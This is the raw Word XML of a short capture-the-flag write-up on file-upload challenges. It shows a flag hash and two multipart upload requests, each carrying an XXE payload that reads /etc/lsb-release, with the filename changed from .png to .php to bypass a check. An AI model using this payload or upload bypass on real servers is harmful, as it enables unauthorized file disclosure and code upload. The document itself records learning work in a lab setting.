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932B2D" w14:paraId="2C078E63" wp14:textId="2740100E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_GoBack" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Challenge level0.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="1201693D" w14:textId="6DCDACBF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="1CAA08F0" w14:textId="505560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8932B2D">
        <w:rPr/>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2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77f5467a68fe64bfd8bf2ed7246856735b9f862f257558d829052e68744cf936ea07467740be32e74ce4cbd1f18bcea8f3e3a93aa34d7561b16d4341956cae8b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="509DB84D" w14:textId="31F6D9D2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="28932B2D">
        <w:rPr/>
        <w:t>First of all, I'm not really into CTF type of challenge but given this one, I tried my best to solve all the challenges. In the challenge level0.php, I was able to get the flag by uploading a PNG file which after intercepting the request and changing the filename extension from .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="28932B2D">
        <w:rPr/>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="28932B2D">
        <w:rPr/>
        <w:t xml:space="preserve"> into .php the result was exactly the one that I expected. Below is the request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="41E158DB" w14:textId="7E7C6422">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="3A3AC29B" w14:textId="2FA3EA9F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Normal Request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="0997E7CB" w14:textId="24A82A19">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="4AFCD77B" w14:textId="3FE4B9EB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------WebKitFormBoundaryFO2tYjplLRx0RgBG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="1620A680" w14:textId="1FC7A28E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Content-Disposition: form-data; name="image"; filename="test.xml.png"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="64B9B5E9" w14:textId="451EA394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Content-Type: image/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="143A0554" w14:textId="186F5AB1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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="1698BF96" w14:textId="20BDAF50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&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="1EE5C845" w14:textId="3C922908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 xml:space="preserve">  &lt;!ELEMENT foo ANY&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="0B0F91D8" w14:textId="0D16E775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 xml:space="preserve">  &lt;!ENTITY bar SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="106BD32B" w14:textId="43C8D2F0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 xml:space="preserve">  "</w:t>
      </w:r>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>file:///etc/lsb-release"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="2660E560" w14:textId="5DB6606E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]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="24B35726" w14:textId="68CDDC58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&lt;foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="1B6A647D" w14:textId="2FEEF7A7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 xml:space="preserve">  &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>bar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="23690C19" w14:textId="3930F33C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&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="1ECE805A" w14:textId="7346C258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------WebKitFormBoundaryFO2tYjplLRx0RgBG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="60C5CE52" w14:textId="0088DF03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Content-Disposition: form-data; name="upload"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="44E4DEA2" w14:textId="5FE68886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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="20CADFB5" w14:textId="7A1BDE55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upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="0AEC225E" w14:textId="1192E22B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------WebKitFormBoundaryFO2tYjplLRx0RgBG--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="00916D5E" w14:textId="6D78A1A0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="7DB5F796" w14:textId="2831FA88">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Modified Request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="4E8D3A29" w14:textId="70DAF3E8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="295BFBE1" w14:textId="3FE4B9EB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------WebKitFormBoundaryFO2tYjplLRx0RgBG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="41833925" w14:textId="22E8A5D4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Content-Disposition: form-data; name="image"; filename="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>test.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="21BF4E7E" w14:textId="451EA394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Content-Type: image/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>png</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="617DD66A" w14:textId="186F5AB1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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="4E980EA9" w14:textId="20BDAF50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&lt;!DOCTYPE foo [</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="18347A0D" w14:textId="3C922908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 xml:space="preserve">  &lt;!ELEMENT foo ANY&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="2D976121" w14:textId="0D16E775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 xml:space="preserve">  &lt;!ENTITY bar SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="5BF41477" w14:textId="43C8D2F0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 xml:space="preserve">  "</w:t>
      </w:r>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>file:///etc/lsb-release"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="5B8B552D" w14:textId="5DB6606E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]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="0C40F034" w14:textId="68CDDC58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&lt;foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="596BA6B7" w14:textId="2FEEF7A7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 xml:space="preserve">  &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>bar</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="782ED7E0" w14:textId="3930F33C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&lt;/foo&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="3C35A42B" w14:textId="7346C258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------WebKitFormBoundaryFO2tYjplLRx0RgBG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="4A7515E0" w14:textId="0088DF03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Content-Disposition: form-data; name="upload"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="464F427A" w14:textId="5FE68886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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="31A15386" w14:textId="7A1BDE55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upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="2D500410" w14:textId="1192E22B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="28932B2D" w:rsidR="28932B2D">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>------WebKitFormBoundaryFO2tYjplLRx0RgBG--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="53E4EE43" w14:textId="3E9EA4EB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="62AD3644" w14:textId="647FB00A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="281C7E27" w14:textId="5522C536">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2AB966DF">
        <w:rPr/>
        <w:t>As you can see in the above modified request, I changed the filename extension of my uploaded file which gave me the result.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2AB966DF" w:rsidP="2AB966DF" w:rsidRDefault="2AB966DF" w14:paraId="370BEAE4" w14:textId="5FA0FA46">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2AB966DF" w:rsidP="2AB966DF" w:rsidRDefault="2AB966DF" w14:paraId="2DCD01B8" w14:textId="15C66EA0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline wp14:editId="7613B7E8" wp14:anchorId="1737826A">
            <wp:extent cx="5962650" cy="3364786"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="859623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709c274e2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32B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="4FB28388" w14:textId="3235F68A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="31B02D93" w14:textId="59AA2DA3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="350C1C6A" w14:textId="6280E5FE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="28932B2D">
        <w:rPr/>
        <w:t>In the challenge level1.php and level2.php since I'm new into this CTF type of challenge, I tried all knowledge that I have about file upload vulnerability bypass but unfortunately not able to get both flags. I tried different types of bypassing from the filename and analyzing the request and also tried doing something in the header like content-type related bypass while intercepting the request but not able to get both flags from level1 and 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="6C63D2CC" w14:textId="3EA55082">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="1000A604" w14:textId="3F894B1E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="747C046A" w14:textId="3A191E26">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="6FDDBD15" w14:textId="7E7079A1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="05EA10D7" w14:textId="5E9FCB13">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="64EE1BB1" w14:textId="0BCDA8E3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28932B2D" w:rsidP="28932B2D" w:rsidRDefault="28932B2D" w14:paraId="44AE3E91" w14:textId="56F554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7F795"/>
    <w:rsid w:val="28932B2D"/>
    <w:rsid w:val="2AB966DF"/>
    <w:rsid w:val="67A7F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F795"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7B001190-B05A-40B1-904D-29C1EC1835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78709c274e242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2021-10-08T05:43:36.6320104Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-08T06:03:08.8534196Z</dcterms:modified>
  <dc:creator>Evan Ricafort</dc:creator>
  <lastModifiedBy>Evan Ricafort</lastModifiedBy>
</coreProperties>
</file>